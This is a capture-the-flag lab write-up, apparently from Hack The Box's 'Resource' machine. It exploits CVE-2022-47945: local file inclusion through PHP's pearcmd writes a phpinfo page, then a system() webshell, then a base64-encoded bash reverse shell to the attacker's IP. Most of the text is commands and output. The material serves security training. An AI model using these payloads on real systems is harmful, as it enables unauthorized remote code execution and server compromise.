CVE-2022-47945

The target web application appears to be vulnerable to CVE-2022-47945 Leveraging the LFI present in the page parameter, it would be possible to achieve RCE

/?page=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?phpinfo();?>+/var/www/itrc/phpinfo.php Switching the parameter to page

┌──(kali㉿kali)-[~/archive/htb/labs/resource]
└─$ curl -i http://itrc.ssg.htb/index.php?page=phpinfo | html2text 
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 39400    0 39400    0     0   480k      0 --:--:-- --:--:-- --:--:--  487k
curl: (18) transfer closed with outstanding read data remaining
HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 04 Aug 2024 11:42:28
GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked
Connection: keep-alive X-Powered-By: PHP/8.1.29 Set-Cookie:
PHPSESSID=b0b3d7759bae7e0eb7924bc5bc91e9b4; path=/ Expires: Thu, 19 Nov 1981
08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-
cache Vary: Accept-Encoding
 
****** SSG IT Resource Center ******
Register Login
#PEAR_Config 0.9 a:12:{s:7:"php_dir";s:26:"/&/
[PHP logo]
****** PHP Version 8.1.29 ******
                                        Linux itrc 5.15.0-117-generic #127-
System                                  Ubuntu SMP Fri Jul 5 20:13:28 UTC 2024
                                        x86_64
Build Date                              Jul 23 2024 09:10:25
Build System                            Linux - Docker
Build Provider                          https://github.com/docker-library/php
                                        './configure' '--build=x86_64-linux-
                                        gnu' '--with-config-file-path=/usr/
                                        local/etc/php' '--with-config-file-
                                        scan-dir=/usr/local/etc/php/conf.d' '--
                                        enable-option-checking=fatal' '--with-
                                        mhash' '--with-pic' '--enable-ftp' '--
                                        enable-mbstring' '--enable-mysqlnd' '--
Configure Command                       with-password-argon2' '--with-
                                        sodium=shared' '--with-pdo-sqlite=/usr'
                                        '--with-sqlite3=/usr' '--with-curl' '--
                                        with-iconv' '--with-openssl' '--with-
                                        readline' '--with-zlib' '--disable-
                                        phpdbg' '--with-pear' '--with-
                                        libdir=lib/x86_64-linux-gnu' '--
                                        disable-cgi' '--with-apxs2'
                                        'build_alias=x86_64-linux-gnu'
Server API                              Apache 2.0 Handler
Virtual Directory Support               disabled
Configuration File (php.ini) Path       /usr/local/etc/php
Loaded Configuration File               (none)
Scan this dir for additional .ini files /usr/local/etc/php/conf.d
                                        /usr/local/etc/php/conf.d/docker-php-
                                        ext-pdo_mysql.ini, /usr/local/etc/php/
Additional .ini files parsed            conf.d/docker-php-ext-sodium.ini, /usr/
                                        local/etc/php/conf.d/docker-php-ext-
                                        zip.ini, /usr/local/etc/php/conf.d/
                                        sessions.ini
PHP API                                 20210902
PHP Extension                           20210902
Zend Extension                          420210902
Zend Extension Build                    API420210902,NTS
PHP Extension Build                     API20210902,NTS
Debug Build                             no
Thread Safety                           disabled
Zend Signal Handling                    enabled
Zend Memory Manager                     enabled
Zend Multibyte Support                  provided by mbstring
Zend Max Execution Timers               disabled
IPv6 Support                            enabled
DTrace Support                          disabled
Registered PHP Streams                  https, ftps, compress.zlib, php, file,
                                        glob, data, http, ftp, phar, zip
Registered Stream Socket Transports     tcp, udp, unix, udg, ssl, tls, tlsv1.0,
                                        tlsv1.1, tlsv1.2, tlsv1.3
                                        zlib.*, convert.iconv.*, string.rot13,
Registered Stream Filters               string.toupper, string.tolower,
                                        convert.*, consumed, dechunk
[Zend logo]This program makes use of the Zend Scripting Language Engine:
Zend Engine v4.1.29, Copyright (c) Zend Technologies
===============================================================================
****** Configuration ******
***** apache2handler *****
Apache Version       Apache/2.4.61 (Debian)
Apache API Version   20120211
Server Administrator [no address given]
Hostname:Port        itrc.ssg.htb:0
User/Group           www-data(33)/33
Max Requests         Per Child: 0 - Keep Alive: on - Max Per Connection: 100
Timeouts             Connection: 300 - Keep-Alive: 5
Virtual Server       Yes
Server Root          /etc/apache2
                     core mod_so mod_watchdog http_core mod_log_config
                     mod_logio mod_version mod_unixd mod_access_compat
                     mod_alias mod_auth_basic mod_authn_core mod_authn_file
Loaded Modules       mod_authz_core mod_authz_host mod_authz_user mod_autoindex
                     mod_deflate mod_dir mod_env mod_filter mod_mime prefork
                     mod_negotiation mod_php mod_reqtimeout mod_rewrite
                     mod_setenvif mod_status
Directive     Local Value Master Value
engine        On          On
last_modified Off         Off
xbithack      Off         Off
***** Apache Environment *****
Variable              Value
HTTP_HOST             itrc.ssg.htb
HTTP_CONNECTION       close
HTTP_USER_AGENT       curl/8.5.0
HTTP_ACCEPT           */*
PATH                  /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/
                      bin
SERVER_SIGNATURE      <address>Apache/2.4.61 (Debian) Server at itrc.ssg.htb
                      Port 80</address>
SERVER_SOFTWARE       Apache/2.4.61 (Debian)
SERVER_NAME           itrc.ssg.htb
SERVER_ADDR           172.223.0.3
SERVER_PORT           80
REMOTE_ADDR           172.223.0.1
DOCUMENT_ROOT         /var/www/itrc
REQUEST_SCHEME        http
CONTEXT_PREFIX        no value
CONTEXT_DOCUMENT_ROOT /var/www/itrc
SERVER_ADMIN          [no address given]
SCRIPT_FILENAME       /var/www/itrc/index.php
REMOTE_PORT           34710
GATEWAY_INTERFACE     CGI/1.1
SERVER_PROTOCOL       HTTP/1.0
REQUEST_METHOD        GET
QUERY_STRING          page=phpinfo
REQUEST_URI           /index.php?page=phpinfo
SCRIPT_NAME           /index.php
***** HTTP Headers Information *****
HTTP Request Headers
HTTP Request  GET /index.php?page=phpinfo HTTP/1.0
Host          itrc.ssg.htb
Connection    close
User-Agent    curl/8.5.0
Accept        */*
HTTP Response Headers
X-Powered-By  PHP/8.1.29
Set-Cookie    PHPSESSID=b0b3d7759bae7e0eb7924bc5bc91e9b4; path=/
Expires       Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control no-store, no-cache, must-revalidate
Pragma        no-cache
***** Core *****
PHP Version 8.1.29
Directive                           Local Value          Master Value
allow_url_fopen                     On                   On
allow_url_include                   Off                  Off
arg_separator.input                 &                    &
arg_separator.output                &                    &
auto_append_file                    no value             no value
auto_globals_jit                    On                   On
auto_prepend_file                   no value             no value
browscap                            no value             no value
default_charset                     UTF-8                UTF-8
default_mimetype                    text/html            text/html
disable_classes                     no value             no value
disable_functions                   no value             no value
display_errors                      On                   On
display_startup_errors              On                   On
doc_root                            no value             no value
docref_ext                          no value             no value
docref_root                         no value             no value
enable_dl                           On                   On
enable_post_data_reading            On                   On
error_append_string                 no value             no value
error_log                           no value             no value
error_prepend_string                no value             no value
error_reporting                     no value             no value
expose_php                          On                   On
                                    /usr/local/lib/php/  /usr/local/lib/php/
extension_dir                       extensions/no-debug- extensions/no-debug-
                                    non-zts-20210902     non-zts-20210902
fiber.stack_size                    no value             no value
file_uploads                        On                   On
hard_timeout                        2                    2
highlight.comment                   #FF8000              #FF8000
highlight.default                   #0000BB              #0000BB
highlight.html                      #000000              #000000
highlight.keyword                   #007700              #007700
highlight.string                    #DD0000              #DD0000
html_errors                         On                   On
ignore_repeated_errors              Off                  Off
ignore_repeated_source              Off                  Off
ignore_user_abort                   Off                  Off
implicit_flush                      Off                  Off
include_path                        .:/usr/local/lib/php .:/usr/local/lib/php
input_encoding                      no value             no value
internal_encoding                   no value             no value
log_errors                          Off                  Off
mail.add_x_header                   Off                  Off
mail.force_extra_parameters         no value             no value
mail.log                            no value             no value
max_execution_time                  30                   30
max_file_uploads                    20                   20
max_input_nesting_level             64                   64
max_input_time                      -1                   -1
max_input_vars                      1000                 1000
max_multipart_body_parts            -1                   -1
memory_limit                        128M                 128M
open_basedir                        no value             no value
output_buffering                    0                    0
output_encoding                     no value             no value
output_handler                      no value             no value
post_max_size                       8M                   8M
precision                           14                   14
realpath_cache_size                 4096K                4096K
realpath_cache_ttl                  120                  120
register_argc_argv                  On                   On
report_memleaks                     On                   On
report_zend_debug                   Off                  Off
request_order                       no value             no value
sendmail_from                       no value             no value
sendmail_path                       /usr/sbin/sendmail - /usr/sbin/sendmail -
                                    t -i                 t -i
serialize_precision                 -1                   -1
short_open_tag                      On                   On
SMTP                                localhost            localhost
smtp_port                           25                   25
sys_temp_dir                        no value             no value
syslog.facility                     LOG_USER             LOG_USER
syslog.filter                       no-ctrl              no-ctrl
syslog.ident                        php                  php
unserialize_callback_func           no value             no value
upload_max_filesize                 2M                   2M
upload_tmp_dir                      no value             no value
user_dir                            no value             no value
user_ini.cache_ttl                  300                  300
user_ini.filename                   .user.ini            .user.ini
variables_order                     EGPCS                EGPCS
xmlrpc_error_number                 0                    0
xmlrpc_errors                       Off                  Off
zend.assertions                     1                    1
zend.detect_unicode                 On                   On
zend.enable_gc                      On                   On
zend.exception_ignore_args          Off                  Off
zend.exception_string_param_max_len 15                   15
zend.multibyte                      Off                  Off
zend.script_encoding                no value             no value
zend.signal_check                   Off                  Off
***** ctype *****
ctype functions enabled
***** curl *****
cURL support     enabled
cURL Information 7.88.1
Age              10
Features
AsynchDNS        Yes
CharConv         No
Debug            No
GSS-Negotiate    No
IDN              Yes
IPv6             Yes
krb4             No
Largefile        Yes
libz             Yes
NTLM             Yes
NTLMWB           Yes
SPNEGO           Yes
SSL              Yes
SSPI             No
TLS-SRP          Yes
HTTP2            Yes
GSSAPI           Yes
KERBEROS5        Yes
UNIX_SOCKETS     Yes
PSL              Yes
HTTPS_PROXY      Yes
MULTI_SSL        No
BROTLI           Yes
                 dict, file, ftp, ftps, gopher, gophers, http, https, imap,
Protocols        imaps, ldap, ldaps, mqtt, pop3, pop3s, rtmp, rtmpe, rtmps,
                 rtmpt, rtmpte, rtmpts, rtsp, scp, sftp, smb, smbs, smtp,
                 smtps, telnet, tftp
Host             x86_64-pc-linux-gnu
SSL Version      OpenSSL/3.0.13
ZLib Version     1.2.13
libSSH Version   libssh2/1.10.0
Directive   Local Value Master Value
curl.cainfo no value    no value
***** date *****
date/time support                 enabled
timelib version                   2021.19
"Olson" Timezone Database Version 2023.3
Timezone Database                 internal
Default timezone                  UTC
Directive              Local Value Master Value
date.default_latitude  31.7667     31.7667
date.default_longitude 35.2333     35.2333
date.sunrise_zenith    90.833333   90.833333
date.sunset_zenith     90.833333   90.833333
date.timezone          no value    no value
***** dom *****
DOM/XML             enabled
DOM/XML API Version 20031129
libxml Version      2.9.14
HTML Support        enabled
XPath Support       enabled
XPointer Support    enabled
Schema Support      enabled
RelaxNG Support     enabled
***** fileinfo *****
fileinfo support enabled
libmagic         540
***** filter *****
Input Validation and Filtering enabled
Directive            Local Value Master Value
filter.default       unsafe_raw  unsafe_raw
filter.default_flags no value    no value
***** ftp *****
FTP support  enabled
FTPS support enabled
***** hash *****
hash support    enabled
                md2 md4 md5 sha1 sha224 sha256 sha384 sha512/224 sha512/256
                sha512 sha3-224 sha3-256 sha3-384 sha3-512 ripemd128 ripemd160
                ripemd256 ripemd320 whirlpool tiger128,3 tiger160,3 tiger192,3
                tiger128,4 tiger160,4 tiger192,4 snefru snefru256 gost gost-
Hashing Engines crypto adler32 crc32 crc32b crc32c fnv132 fnv1a32 fnv164
                fnv1a64 joaat murmur3a murmur3c murmur3f xxh32 xxh64 xxh3
                xxh128 haval128,3 haval160,3 haval192,3 haval224,3 haval256,3
                haval128,4 haval160,4 haval192,4 haval224,4 haval256,4
                haval128,5 haval160,5 haval192,5 haval224,5 haval256,5
MHASH support     Enabled
MHASH API Version Emulated Support
***** iconv *****
iconv support         enabled
iconv implementation  glibc
iconv library version 2.36
Directive               Local Value Master Value
iconv.input_encoding    no value    no value
iconv.internal_encoding no value    no value
iconv.output_encoding   no value    no value
***** json *****
json support enabled
***** libxml *****
libXML support          active
libXML Compiled Version 2.9.14
libXML Loaded Version   20914
libXML streams          enabled
***** mbstring *****
Multibyte Support

It rendered the phpinfo() function

Webshell

/index.php?page=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?system($_GET['cmd']);?>+/var/www/itrc/webshell.php Now I will write a PHP webshell to /var/www/itrc/webshell.php

┌──(kali㉿kali)-[~/archive/htb/labs/resource]
└─$ curl -s 'http://itrc.ssg.htb/index.php?page=webshell&cmd=id' | html2text 
****** SSG IT Resource Center ******
Register Login
#PEAR_Config 0.9 a:13:{s:7:"php_dir";s:37:"/&/uid=33(www-data) gid=33(www-data)
groups=33(www-data) /pear/php";s:8:"data_dir";s:38:"/&/uid=33(www-data) gid=33
(www-data) groups=33(www-data) /pear/data";s:7:"www_dir";s:37:"/&/uid=33(www-
data) gid=33(www-data) groups=33(www-data) /pear/www";s:7:"cfg_dir";s:37:"/&/
uid=33(www-data) gid=33(www-data) groups=33(www-data) /pear/cfg";s:7:
"ext_dir";s:37:"/&/uid=33(www-data) gid=33(www-data) groups=33(www-data) /pear/
ext";s:7:"doc_dir";s:38:"/&/uid=33(www-data) gid=33(www-data) groups=33(www-
data) /pear/docs";s:8:"test_dir";s:39:"/&/uid=33(www-data) gid=33(www-data)
groups=33(www-data) /pear/tests";s:9:"cache_dir";s:39:"/&/uid=33(www-data)
gid=33(www-data) groups=33(www-data) /pear/cache";s:12:"download_dir";s:42:"/&/
uid=33(www-data) gid=33(www-data) groups=33(www-data) /pear/download";s:8:
"temp_dir";s:38:"/&/uid=33(www-data) gid=33(www-data) groups=33(www-data) /
pear/temp";s:7:"bin_dir";s:33:"/&/uid=33(www-data) gid=33(www-data) groups=33
(www-data) /pear";s:7:"man_dir";s:37:"/&/uid=33(www-data) gid=33(www-data)
groups=33(www-data) /pear/man";s:10:"__channels";a:2:{s:12:"pecl.php.net";a:0:
{}s:5:"__uri";a:0:{}}}
© 2024 Strategic Solutions Group (SSG) | All rights reserved

RCE confirmed

Reverse Shell

../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?system(base64_decode("L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4gL2Rldi90Y3AvMTAuMTAuMTQuMTcyLzk5OTkgMD4mMScK"));?>+/var/www/itrc/shell.php Writing a based64 encoded reverse shell payload into /var/www/itrc/shell.php This will be decoded via the native PHP’s base64_decode() function and executed through the system() function

┌──(kali㉿kali)-[~/archive/htb/labs/resource]
└─$ curl -s 'http://itrc.ssg.htb/index.php?page=webshell&cmd=ls+-la'
 
[...REDACTED...]
 
a:13:{s:7:"php_dir";s:37:"/&/total 120
drwxr-xr-x 1 www-data www-data 4096 Aug  4 12:30 .
drwxr-xr-x 1 www-data www-data 4096 Jul 25 11:28 ..
-rw-rw-r-- 1 www-data www-data 4313 Jan 24  2024 admin.php
drwxrwxr-x 1 www-data www-data 4096 Feb 26 23:18 api
drwxrwxr-x 1 www-data www-data 4096 Jan 22  2024 assets
-rw-rw-r-- 1 www-data www-data  979 Jan 23  2024 create_ticket.php
-rw-rw-r-- 1 www-data www-data  344 Jan 24  2024 dashboard.php
-rw-rw-r-- 1 www-data www-data  308 Jan 22  2024 db.php
-rw-rw-r-- 1 www-data www-data  746 Jan 24  2024 filter.inc.php
-rw-rw-r-- 1 www-data www-data  982 Jan 24  2024 footer.inc.php
-rw-rw-r-- 1 www-data www-data 1869 Jan 24  2024 header.inc.php
-rw-rw-r-- 1 www-data www-data  844 Jan 22  2024 home.php
-rw-rw-r-- 1 www-data www-data  368 Feb 19 18:14 index.php
-rw-rw-r-- 1 www-data www-data  105 Feb 19 18:14 loggedin.php
-rw-rw-r-- 1 www-data www-data  433 Jan 23  2024 login.php
-rw-rw-r-- 1 www-data www-data   73 Jan 22  2024 logout.php
-rw-r--r-- 1 www-data www-data  619 Aug  4 12:14 phpinfo.php
-rw-rw-r-- 1 www-data www-data  566 Jan 23  2024 register.php
-rw-rw-r-- 1 www-data www-data 2225 Feb  6 16:54 savefile.inc.php
-rw-r--r-- 1 www-data www-data 1735 Aug  4 12:30 shell.php
-rw-rw-r-- 1 www-data www-data 4968 Feb  6 17:09 ticket.php
-rw-rw-r-- 1 www-data www-data 1374 Jan 24  2024 ticket_section.inc.php
drwxrwxr-x 1 www-data www-data 4096 Aug  4 12:26 uploads
-rw-r--r-- 1 www-data www-data  819 Aug  4 12:16 webshell.php

I can confirm the file write; /var/www/itrc/shell.php

┌──(kali㉿kali)-[~/archive/htb/labs/resource]
└─$ curl -s 'http://itrc.ssg.htb/index.php?page=shell'

Triggering the reverse shell through LFI on the page parameter

┌──(kali㉿kali)-[~/archive/htb/labs/resource]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.172] from (UNKNOWN) [10.10.11.27] 40546
whoami
www-data
hostname
itrc
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.223.0.3  netmask 255.255.0.0  broadcast 172.223.255.255
        ether 02:42:ac:df:00:03  txqueuelen 0  (Ethernet)
        RX packets 2720637  bytes 250690719 (239.0 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2218411  bytes 393711959 (375.4 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 17298  bytes 1953929 (1.8 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 17298  bytes 1953929 (1.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial Foothold established to the target environment as the www-data account It appears to be a Docker container

InfoSec LAB

Explorer

Resource_Exploitation

CVE-2022-47945

Webshell

Reverse Shell

Interactive Graph View

Table of Contents

Backlinks